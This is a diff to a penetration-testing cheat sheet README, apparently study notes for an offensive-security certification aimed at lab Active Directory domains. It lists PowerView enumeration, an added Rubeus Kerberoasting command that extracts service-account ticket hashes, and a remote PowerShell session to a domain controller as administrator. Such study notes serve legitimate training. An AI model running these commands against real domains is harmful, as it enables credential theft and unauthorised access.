njahrckstr/CPTS-cheatsheet/README.md

 # PowerView tool used to enumerate the mssqlsvc account from a Windows-based host.
 Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc | select samaccountname,memberof

+# Performing Kerberoasting Attach with Rubeus Using /domain flag
+.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap

 # PowerView tool used to enumerate groups with users that do not belong to the domain from a Windows-based host.
 Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
+# Convert the SID to name if you get results
+Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500

 # PowerShell cmd-let used to remotely connect to a target Windows system from a Windows-based host.
 Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator